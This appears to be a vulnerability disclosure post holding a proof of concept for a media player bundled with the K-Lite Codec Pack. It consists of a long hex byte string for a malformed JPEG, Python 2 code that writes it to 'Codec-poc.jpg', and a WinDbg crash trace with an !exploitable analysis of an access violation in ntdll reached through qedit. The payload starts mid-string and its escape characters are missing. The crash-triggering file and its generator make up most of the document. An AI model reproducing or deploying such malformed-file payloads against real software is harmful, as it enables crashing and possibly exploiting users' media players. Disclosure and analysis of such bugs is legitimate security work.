x73x65x9Ax3Fx53x90xA1x5Ax41xDCx5CxB6x33x77x3Ex63x93x52x78x06x0Dx1BxE2x6Cx17x25x36x8Fx08xD9x59x2FxADxB2xDAxA8x2CxD0x57x9CxA3xF2x53x30xBAx7CxFBxC7x8AxD1x15x69x1Bx6Fx92x15xA1xB4xB4xA3x86x71x31x3Ex72x0Bx33xC0xF3xCCxCFx83x0Cx3Ex92x9Bx71x2ExF6xC5xDBx6DxFAx43xE3x02x34xEAx72x71x46x21x52x91x48x02xD6x5Cx24x43x6Cx8AxAFx5Ax94xEBx12xD2xD8xB0x46x9Fx50x64x36x7AxE6x17x14xDAx6Cx42xEExAFxC7x61x0ExFCxEFx03xA0xA3x81x80x56x88x39x7Dx02x0Cx12xEAxD3x98xD1x0Fx27xD4xE9x3CxBFx93xCCxEBx2Fx3FxFDx3FxEEx74xDEx5CxF4x7CxBFx8Dx71xF6xC6x1Ex09xA2xFAx1Ax77xC4xF1x81xE2x64xFDx0Dx6Ax6Cx3Cx5FxF0xE6x6CxFEx2DxE6xAEx27xB7xBCxBBx35x3Fx79xD4xFFx00x92x97xC4x75x79x9Dx11xFBxE2xCFxF2x61xFAx6Ax7BxF5x3Ex7FxF1x3Cx6Cx7Ex0Dx7Dx2Bx9FxC4xD8x65xCDx7Ax0AxF9x74x95xB7xE5x39xFEx30xFEx3DxCBxFCx7FxF6x67x3FxFFxDAx00x0Cx03x01x00x02x00x03x00x00x00x10x73x9Ex2Cx7Ex21x42x2Bx58x35x35x3Dx7Cx52x0CxBAx11x06x8Ex01x2Bx9DxE8xCAx16x0Fx63xEBxE6x7Cx74xBFx61x79x1Ex6Ax4Bx57x28xE9x14x9Dx41xA1xADxCFxE3x4Dx44xBFx1FxA8xD5xEFx4Ax00xAFx39xE9x45x50x6AxABx6Ax40xF7x01xE9x13x9Dx0FxD7x67x53xDCx82x71x5Ax19xA7xBFx6AxB8x42x44x86x65xC2xC0x96xDFxFFxC4x00x24x11x01x00x02x02x02x02x02x02x03x01x00x00x00x00x00x00x01x00x11x21x31x10x41x20x51x61x71x91xB1x30x81xA1xF0xFFxDAx00x08x01x03x01x01x3Fx10xB8xC3x88xAFx31xD4xF9xE2x01x25x16xAFxE9x61xFEx33x57xE6x0DxCAx8Bx8ExFCxE7x3AxA3xF5x04x73x0Ex14x27xBAxD4x6AxC3x47x35xE7x7Ax96x5Cx5Cx13x78xF7x14x08xD9x75x9Cx62xFFx00x11xE5x7ExE1x0DxF6xC0x66xB7x72xA1x88x7Ax8AxB3x30xEEx28x19x5DxB5xEFxE2x51x92xBFx85x2CxE3x79x64xA8xB2xE6x51xC9x19xF5xC3x7BxAAxF7x67x71x02x44x8Ex1Bx61xDDx41x75x08x03x0DxA1x2Ax02x7Ex00x32xD5x72xBCx99xDFx0Cx26xF7x08x53x01x07x11x6Cx3Ax45x42xA8x39x8Cx38x3ExA6x90xB8x2AxB7x11x5Dx6Ex7BxE3xA0x11x81xBAx72x52xD7xC2x00x54xFCx2Bx24xAEx7Cx58xEFx81x01xDEx84x2Ax74x41x0Ax3Ax8ExABx99xE3x08xEEx63x84x42x77x51xF9xB1xDAx40x0DxA1x69x89x0AxC6x37x5FxBBxAFxFBxF7x15x57x77xE3x55xC4xEFx87x53x3Ex7AxFCx83x30x6Dx89x17xD4x39x57x99x74xA5xF0x95x35x16xA3xAEx4Ax3BxBCx9Ax3DxC3x2FxC7xEAx20x39x12xA8x5Ex63x5Ax99x7Ax69x71xE2x1CxB8xDBx86xAAx26x25x62x34x0Ax12xEFx87x1Ex80x2Bx25x9BxA2x00xFAx88xBBx94x6BxB8x86x62xB7xA9x87x5Ex2Fx1Bx70x10x38x78x8Dx53x9Ax00x44xEEx5Dx91x30xE6xB3xE9x2AxFBx4DxBCx59xDCx18x42x5Ex22xC1x05x56x50xDFx04xE5xB8x06x6Ax4Ax3Ax87x63x2FxC9x06x1FxA8x34x9BxA9x67x8Bx1DxC2x1Cx3Cx9AxE1xA1xC3xF7x77xFAxE0xD4xD2x1Bx9AxFFx00x53x5FxD4x7Cx7FxFFxC4x00x26x11x01x00x02x02x02x02x01x03x05x01x00x00x00x00x00x00x01x00x11x21x31x41x51x10x61x71x81x91xA1x20xB1xC1xD1xF0xF1xFFxDAx00x08x01x02x01x01x3Fx85x66x36xC0xDFx65xF7x40xDEx96x09x45xCCxB1xF5x53xF6x65xFEx26x17xD3xC9xEFx7FxBCx4AxFBx0Fx8Cx5Cx50x39xFDx92xE0x75x28x26xE8x2BxBBx7FxDFx85xB6xE6x27x74xFBx41x4BxC1xCBx6Ax5Bx2Dx13x52xD0x77x28xAFxEDx00xAEx1AxB8xDAx89x13xA6x2CxB0x6Ax51x5Cx67xD7xD2x35x4DxA2xD6x78xDBxD4xADx05x19xF7x7Ax8Ax09x49xBAx5CxA0xF5x16xE5xD3x3AxEAx51xC4xA6x03x50x97xE0x7Cx11x85x48x91x5DxC4xE3x06x9BxE5x86x58xC5xE6x2Dx77xD7xF8x5FxD2x56x2Fx47x9Cx6FxE8xDCx6AxA0xE3xA4xD7xD6x51x01xA8xACx05x29x14x4Cx56x3DxCAx25xA4x4Ex83x12xF5x2Ex59xC7x81x41x67x83x72xA9x72xAEx11x6DxB9x69xC1x2Bx4ExC8x23x20x7Bx80xD4x17x15x49x6Bx28x8DxFFx00x32xE7xE2x20xDCx76xBBx8Cx1Fx09xAEx29xC6x73x56x0FxB3x07xF7x4Ax36x47x66xDFxB2xD9xEBx20x73x76x88x5Cx87x99x8BxC8xDCx02xAEx62x2Dx0Ax06xD8xF0xF1x07x8Cx6Ax5Ex13x88x4Dx6Fx71x0Fx98xCAxDCxDDx01xCEx25xA7x4CxBFx88x98x8DxC5x97x88x28xC0x36x4Fx6CxE0xB5xA3xAExFDx04x58xD6x1Dx37x81x56x1AxBExC9xB3x6Ex3Cx43xE0x6Ex0Fx37xE1xFFx00x23x2Cx25x42xA3x18xE4xC4xA8xFBx4Dx2Cx48xFBx4AxBEx89x49xB4x05x5ExD0x61x5Bx80x46x2Cx56x18xB8x54xE6x09xBCx32xD4x4Ax31x4CxCBx35x65xF3xD4xACxDFx93x71x50x1CxCBxA1x70xD1x7Bx8Cx86x67x50x47x19x8BxCExC9x12x00x2Ax74xEFx1Bx46x2Cx47x32xB0x6Ax2Bx07xA8xE8xC4xA0xA2x0BxBAx88xA5x73x2Bx60xA3x70x37x5FxE8x37x2Ax18x27xCAx3Cx2Fx44x06x8CxBCx0Dx0Cx46x05x4Ax87xD4x49x4DxBFx89xADxF1xB4x06x35x85x3Ax86x25xE2xBAx8Cx3Cx2Ax1Ex08x46xA3xBFx26xFCx52x38xC5x75x96x18xB6x22xECxB8x5Ex15xC0x81x18x0Bx58x9Ax30x87x70xC2xE9x18x0DxDFx3Dx40x30xD4x7AxE4xB8x84x08x52xC6x8ExFFx00x98xF1xE0xA7x93x73x44xA7xFAxBFx2BxDFxE1x29xFDxD7x36x3Cx79xAAxFCx4AxCDx7Fx13x69xB4xBCxD6xB8x8FxB7xD3x51xD3x53x79x78x3Ex5FxE2x7Bx7Fx2DxEAx52xE5x3Dx4Cx7AxFCxCCx7AxFCxC2xA7xFFxC4x00x26x10x01x01x00x02x02x02x02x01x04x03x01x00x00x00x00x00x01x11x00x21x31x41x51x61x71x81x91x10xA1xB1xC1xD1xF0xF1xE1xFFxAEx00x08x01x01x00x01x3Fx10x41x2Dx00x27x60xC2xF7x70x32x02xBAx80x69x58xD7x99x80x50x12x12xDAx75x05xE1xBDx64x3Dx10xA6x02xE3x41xDDx30x9FxF2xB5x4Bx60x7Bx93xE1xC0x0Dx40x69xDEx60x14x10xE9xE7x35x16xDCx15x53xEBxC2x9CxE1x69xB7x3CxEAx03xB6x05xF7x8DxECx5Dx4Bx47x8FxE0x2Fx02xE5xADx40x54x58x52x5Ex32xF7x35xD8xE7x06xC6x6ExDAx9Ex00xB3x2Dx6Cx93xACx10xABx8Cx02x86x08x1Cx60x71x77xDBx92xECxAEx4Cx8BxF3x59x57x32x20x79x0CxB8x73x44xBAx8Fx6Cx6FxDBxD5x3FxC6x2Cx05x5Ax2AxBFxCEx2CxDDx7Cx0Fx16x8FxC7x48xFBx28x6Bx03x05x60xDExCBxFBxCCx94xE1xF6x3Bx8CxC7x48xD7xBCx5Ax90x5Bx29xEDxD6xE0xD8xB5x35x9Cx62x5Bx25x27x79x3Cx14x88x16xE6x2DxE1x32xC3x37x30xD4x47xF3x81x35x34x78x54x69xFCxE6xD5x9Ex78xA4x52xDEx2Ex34x1BxD0xB2xBDx1Ex74x58x8Ax8Cx27x04x0Dx04xADxC7xE7x39x43x89xCBx1AxF4x32xA7x97x39x3Dx31x94xFFx92x7DxFBxE5x7Cx84x04x04xD0x84x57xA6xE1x47x46xD0x20x34x9Ax7Ex73x70x0CxFEx28xA2x7Dx73x88x8ExBEx12xE5x36x47x6BxF7xACx1DxB3xA7x2CxD2x44x6AxC8xD4x38x03xBAxA7x41x30xBAx45xB6x24x1Cx1Fx37xCFx74x7Ax4Dx3Dx66x80x82x57xB5x7Ax32x50xD7x7BxD6x8CxD6x04x5AxF3x3Bx7BxCBx84x60x6Bx28xECxD7xACx6Bx47x3BxE4x9Fx3Ax26x6CxAAx37x84xD6x07x03xA3x87x1CxB2x22x02xE8x63xBDx3CxEEx64x1Ex45x08x0Ax2Dx3Fx19x7Fx1Bx39x69x8Fx6Bx21x89x52xB6xE3x57x78x22x63x4Ex01x80x8Ax3Bx35xFEx70xCAxE7x1Bx2CxB8x83x9Ex87x8Ex72x86xAEx43xA0x52x41x68xDCx60x88x02xCEx98xACx31x34x27x02x95x9Bx92x51x2Bx1Bx4Dx2Ax5Cx28xD0x4CxAAx0Ex42x41x3CxFAxC3x6Cx0Ax86x82x06x3DxE1x68x55x13xA4xF9x1Ax19x33x50xD8xC7xBBx07x9Fx63x9Cx81x54xD4x1CxDAx27xC6x4ExB1xD1x20x40x8Bx68xC3x66x21x68x06x37x6Ex87x27x6Bx6Cx16xCDx12x55x68xAAx23xAAxEFx85xC9x90xABx41xA0xF2x60x42xEAxC2x4ExEFx9FxD0x47x1Dx40xFDx22x4Ex46xFCx3Fx37x18xBCx07x29xA8xAExF2x60x1BxF5x8Fx8BxE3x7CxA2xB7x04x47x68x84xD5x9FxB6x11x33xE1xA1x2AxF8x0Bx31xDEx07x0Fx20x17x5DxF4x30xA7x33x53x40xD6x04xE0xE0xCAx3BxEDx84x00x42x5Cx02xF1xECxE6xF5xD6x06xA3xA0x15x60x18xA2x83xEDx3Bx24xE3x0Fx40xE6x1Fx7Dx22x93xDAx83x94xC9x68xC4xC6x01xE1x10x56x17x59xFExEBxC3x21x22x9Ex55x01x1ExACxB8xC1x2ExB5x7Ex2Ax7BxA4x2Ex71xD4x0Bx6Ax04x39x5Cx85xE7x2Ax8Dx5Fx2AxD1xC2x18x73x32x4DxB9xE5x98x4AxDAx05x25xDBxC1x1Ex3Bx30x0AxEBxA2x7Bx90x9Fx21x2ExC9x85x04x74x1Bx4CxCEx54x49x01x6Bx97xCCx1AxDEx92x20x91x3CxE2x3Ax06x9CxA1x3Ex71x41x4Ax66xE9x15xDEx12x96x40x02x06x8Dx3CxE0xCCx45xB6x16xBFx78xE0xA5x2Ex41xB4x50xAFx2CxE4xF3xC7x54x5AxD5x09x60x5Cx2Cx45x47x9Dx52x3Ax3CxF1x8FxAFx72x1Ax4Ex60x90x8Fx3BxD9xC6x5CxC3xD3x03x8Dx0Cx03xE8x71x8Cx88xECx64x90xF3xACx5CxF3x4Dx12x00x6Dx14x7AxC1xD0x30xF5x2Fx80x09xDEx01x92x30x85xBFx01x04xADxA4x28xC3xE8x07xF0x73x44xA9x1BxE4x5Cx24x6Bx52x6Cx90x54xEAx69x84x10x71x08xA7x6Bx50x0Ex6Ex3CxF1xF8x92x89x7Dx07x17xD6x1Bx14x68x37x5Ax1CxDEx73x9CxC0x14x95x92xE3x75x56x6Bx63xF2xC9x47x72x07x08xF4x6Fx86xA9x89xD5x91xA5x6Cx02xB0x77x5Fx78x1Bx55x90x61xFCx5Bx88x5Dx91x8Ax48xF1x12x66xB1x4Bx7Dx99xDEx02x3Dx07xA8xE5x8Cx66x35x08xCBx4CxDEx9CxBAxBExE1xE1x06x41x80x33xB3x14x3Ax00x00xC5x76x6BxD2x75x8Bx93xA2x07x24xBEx80x01x8Bx9DxC5x4Dx30x43xE6x7DxCCxF2x98x3Ex95x5BxF0x5Cx59xE5x4Dx53x14x01x01xE3x2Dx08x45x51xE8xDEx70x40xE6x26x47x93xC1xDEx6Fx96x53xD1x34x58xD2x69xBExF1x55xB6xB5xFAxE0x7Dx74x03xA5xE0x05x99x1AxA2x20x13x5Dx5FxCEx32x51xCCx82x11xB2xAFx85xE6xD8x6CxF6x6Ax91x6Ex66x94x8Fx17xA6x78xBDx87x5ExF7x4ExABxDEx69x47xC4x76x47x36x5Ax3Dx00x04x36x71xCExF1x6Bx22xB0xD8xD6xC4x55x5CxDCx73x98x75xC6x40x07x48x60x6DxDCxD4xA9x7Fx9Cx71xA3x05xEFx1Ex47xCCx7FxB2x65x9AxB0x1Ex5Fx5Dx98x7Ax56xE2xB2xE2x94x60xCDxE3x4ExA0x90x1CxA3x5CxBBxCFx2Ex83x09x48x8Ex8Ex9Fx37x19xA7x09x13x86x69x95xBExC2x3Ax08x15x55xBEx4Cx39x45x5Cx25x91xACx34x87x78x61x08x48x6Ex12x08x2BxDBx83x79xA5x0ExA0x00xB2x50x10x51x5Dx66xC5xB4xB4xBBxA0xE4x38xDAx21x9Ax8Bx84x66xC0x7Ax0Cx20x1Dx20xA4xA4xC6x60x66xEEx39x98x69xAEx5Ex6Ex00xE7xABxDFxC0x58x24x5AxE8xE1x44xEBx6ExFAx91x41x80x87x21x7BxC7x4Bx78x7Dx0DxC1xB6x82xDFx49x36xA8x4Cx6Ax05x3Bx17x23x24x8Ax6AxA3xB4x6Cx4Cx20x2Cx90x72x9BxD0x64x50x0Cx2ExCExC1x44x8Bx0Ex72x6Bx8Dx1Cx39x30x75xDDx0Bx13x9FxB4xC1xA5xC2x6Cx6BxAFxA3x1Ax8Dx2Dx5Ax82xF5xCEx0Dx31x88x18x9Fx7Cx23xD4xCBx04xD0x1Cx3Ex5CxE3x70x71xEFx33x47xE0x0Bx30xC1x53x6Dx03x40xDBx9Ax39xB1x12xEAx50x86xCAx04xC2xC7xFExC2x14x3Bx5BxD9x5DxEFx28x8Bx02x52xB1xF4x35xF1x94x69xA7x42xD1x62x6DxD1x81x12xACxBCx9AxC7x11x73xBAx14x46xF2xE8x2Fx2DxE3x8Fx4BxA8x82x98x01x10x23xD6xEEx11x24x06x1CxF0x30x4Bx44x7BxF9x39x23x80xA7x33x58x2BxADxCEx14xAFx28xA8xE8x63x73xD6x85x59x4DxECx88x3FxBCxBAx15x72xB0x69xD9x17x4Bx8Ex09x2Fx04x5Ex03x83xD6x11x74x78x55x3Cx8Dx6Dx66x44x11x09x2Bx31x47x52xDDxFAxC8xBCx15xBAx24x60x2FxB1x63xBCx49x0Dx37x96x53x71x6BxA6x17x8Cx82xCAxBCxAAx63xC2x58x57xC1xF7x85x16x20x09xBExDBxC4x05xCFx41xBAxC1x05x6Ex03x59x6AxA9xA6x6BxC3x3AxC3xA5x3FxB7x1Dx0Ex24xF3x78xFCxE2xD2x48x35x09x05xE9x5CxD6x81x72x2Dx5Bx3Ax64x87xC6x6Dx10x8FxBFx7DxBDx19x6DxEFx04x6Ax65x88xBDx15xA1xD6x61x84x25x49x0Dx7Ax0Ax02x43x00x73x7Bx04xACx00xD3x74x31x62xDBx05x25x74x1AxF6xAAxF1xBCx55x22x97x74x23x1Ax4Cx9Ex91x34x16x78x01xC1x23x0AxDExB1xEFxB6x64x02xB7x76x21x61xCFx38xF4x4Ex96x83x44x0Dx09xE7x2Cx02xA1x77xA6x88x0Ex01x82x60x02x6Ex9AxDFx83xDBx81x8Cx5Bx92x14x47x62x92xF5x90xEAxA6x88xA1x79x42x2Ax34xE9x95x75xA5xA6xCCx27x00x7DxE5xD1x29x16x3AxFCx87xF1x85x51x44xF6x9ExB0x48x34x04x59xC6x69x80x2Ex4ExBEx33x74xD1xB6xCBxB7x05x73xD5x7DxCDx9Fx96x9Fx53xD8x7FxC5x02x7CxB6xBFxF8x99xC6x69xF2xAFx2Bx7ExDExF3x80xF8x3DxBEx59xC9x78xFDx9Fx03xBFxEFx3FxE7x3Bx75xF4x73xDCxE3x79xF0x1BxFFx00x76x7Bx7Ax31xE1x59xF3x62x4Ex5Fx6Dx4Bx73xFCx7AxEFxFDxC7x79xC0x7FxB0xABx3FxD4x78x64x7Ex76xFAxEFxF8xD5xB9xFDx99xF7x0Fx1BxF6xF3x9Ex81xF8xCFxDFx0FxE0x2ExDCxBFxBEx70xDDxB3x53xCFxD7x3CxF7xF5x73xC3xFAxFCx22x76xFAx5Fx96x7Fx17x96xD5xD7xA7xB3x6BxB9x9Ex99xF8x96xFFx00x57xA9x9Fx7BxF4xDDxBFx8FxEDxFDx3ExE7xE7xF8x9CxFFxD9"

outfile = file("Codec-poc.jpg", 'wb')

outfile.write(value)

outfile.close()

print "Created Poc"

windbg result:

0:000> g
ModLoad: 629c0000 629c9000 C:WINDOWSsystem32LPK.DLL
ModLoad: 74d90000 74dfb000 C:WINDOWSsystem32USP10.dll
ModLoad: 10000000 1002e000
C:PROGRA~1SearchProtectSearchProtectinSPVC32Loader.dll
ModLoad: 10000000 10011000 C:Program FilesBenchBServicehelper.dll
ModLoad: 5b860000 5b8b5000 C:WINDOWSsystem32NETAPI32.dll
ModLoad: 74720000 7476c000 C:WINDOWSsystem32MSCTF.dll
ModLoad: 755c0000 755ee000 C:WINDOWSsystem32msctfime.ime
ModLoad: 01880000 01b45000 C:WINDOWSsystem32xpsp2res.dll
ModLoad: 76f50000 76f58000 C:WINDOWSsystem32wtsapi32.dll
ModLoad: 76360000 76370000 C:WINDOWSsystem32WINSTA.dll
ModLoad: 01e50000 02011000 C:Program FilesK-Lite Codec PackMedia
Player Classicmpciconlib.dll
ModLoad: 017c0000 017c8000 C:Program FilesInternet Download
Manageridmmkb.dll
ModLoad: 76360000 76370000 C:WINDOWSsystem32winsta.dll
ModLoad: 76fd0000 7704f000 C:WINDOWSsystem32CLBCATQ.DLL
ModLoad: 77050000 77115000 C:WINDOWSsystem32COMRes.dll
ModLoad: 74810000 7497d000 C:WINDOWSsystem32quartz.dll
ModLoad: 75f40000 75f51000 C:WINDOWSsystem32devenum.dll
ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll
ModLoad: 76c30000 76c5e000 C:WINDOWSsystem32WINTRUST.dll
ModLoad: 76c90000 76cb8000 C:WINDOWSsystem32IMAGEHLP.dll
ModLoad: 736b0000 736b7000 C:WINDOWSsystem32msdmo.dll
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv
ModLoad: 72d10000 72d18000 C:WINDOWSsystem32msacm32.drv
ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll
ModLoad: 60ca0000 60d2c000 C:WINDOWSsystem32qedit.dll
ModLoad: 75a70000 75a91000 C:WINDOWSsystem32MSVFW32.dll
ModLoad: 763b0000 763f9000 C:WINDOWSsystem32comdlg32.dll
ModLoad: 73b30000 73b45000 C:WINDOWSsystem32mscms.dll
(1fb0.1dc0): Unknown exception - code 00000000 (first chance)
(1fb0.1dc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=01fdd008 ecx=7ffdb000 edx=003e0608 esi=003e0000
edi=01fdd000
eip=7c96d811 esp=01d4f5ec ebp=01d4f64c iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96d811 0fb707 movzx eax,word ptr [edi]
ds:0023:01fdd000=????
0:004> .load winext/msec.dll
0:004> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:WINDOWSsystem32msvcrt.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:WINDOWSsystem32qedit.dll -
*** WARNING: Unable to verify timestamp for image00400000
*** ERROR: Module load completed but symbols could not be loaded for
image00400000
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:WINDOWSsystem32kernel32.dll -
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address is used as one or more
arguments in a subsequent Function Call starting at
ntdll!RtlpNtMakeTemporaryKey+0x0000000000007d45 (Hash=0xc7e5b6ca.0x7d7ebe9a)

The data from the faulting address is later used as one or more of the
arguments to a function call.

0:004> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be
wrong.
01d4f64c 7c949e1c ntdll!RtlpNtMakeTemporaryKey+0x7d45
01d4f734 7c927553 ntdll!LdrAlternateResourcesEnabled+0x33bd
01d4f804 77c2c2de ntdll!RtlOemStringToUnicodeString+0xee
01d4f84c 60cd08bc msvcrt!free+0xc3
01d4f860 60cd1f38 qedit!DllRegisterServer+0x20cff
01d4f880 60cb2ee9 qedit!DllRegisterServer+0x2237b
01d4f894 60cc38b1 qedit!DllRegisterServer+0x332c
01d4f8a0 004dfe58 qedit!DllRegisterServer+0x13cf4
01d4f954 004e1cb5 image00400000+0xdfe58
01d4fa10 00520659 image00400000+0xe1cb5
01d4fd74 00526383 image00400000+0x120659
01d4fe34 004facf0 image00400000+0x126383
01d4fe58 006f7708 image00400000+0xfacf0
01d4fe74 006f73a8 image00400000+0x2f7708
01d4fe88 006f78d5 image00400000+0x2f73a8
01d4fe94 006f749b image00400000+0x2f78d5
01d4fea0 006f744c image00400000+0x2f749b
01d4fecc 006f7c22 image00400000+0x2f744c
01d4ff70 008191a7 image00400000+0x2f7c22
01d4ffa8 008192cf image00400000+0x4191a7
01d4ffb4 7c80b713 image00400000+0x4192cf
01d4ffec 00000000 kernel32!GetModuleFileNameA+0x1b4

 

TOP